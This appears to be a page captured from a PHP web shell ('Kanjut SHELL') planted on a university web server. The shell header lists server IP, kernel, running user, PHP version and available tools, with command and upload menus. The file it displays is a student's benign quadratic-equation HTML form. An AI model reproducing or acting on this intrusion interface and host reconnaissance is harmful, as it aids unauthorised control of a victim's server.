Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.145.155.149
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/idetonyeaku/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/idetonyeaku/public_html/quadraticequationform.html
<!--
        File: quadraticequationform.html
        Assignment: 1 Part 3 
        Due: Feb. 12, 2018 
        Author: Ikechukwu Etonyeaku
        Goal: Design a form that includes the text boxes for a, b, and c of quadratic equation, ax2+bx+c=0.
	And then create the action page displays the solutions (display to one decimal place). If no real
	roots, display the message.

-->

<HTML>
<style>
body {
  border: 2px solid black;
  padding: 25px;
  background:url(http://www.avatarys.com/var/albums/SPORT-IMAGES-%26-BACKGROUNDS/Sport-Logos/English-Premier-League-Logos/1920x1080-Cool-Soccer-Logos/Borussia%20dortmund%20logo%20Cool%20Soccer%20Wallpapers%201920x1080.jpg?m=1435255625);
  background-repeat: no-repeat;
  background-size: auto;
}
</style>
<Font color = black>
<CENTER>
<H2>
The Quadratic Equation Form: ax^2+bx+c=0 
</H2>
<HR>
<FORM action=quadraticequationform.php method=post>
a? <INPUT type=text name=aVar>
<P>
b? <INPUT type=text name=bVar>
<P>
c? <INPUT type=text name=cVar>
<P>

<P>
<INPUT type=submit value="Submit Form">
<INPUT type=reset value="Reset Form">
</FORM>

</CENTER>
</html>

Stv3n404 - 2023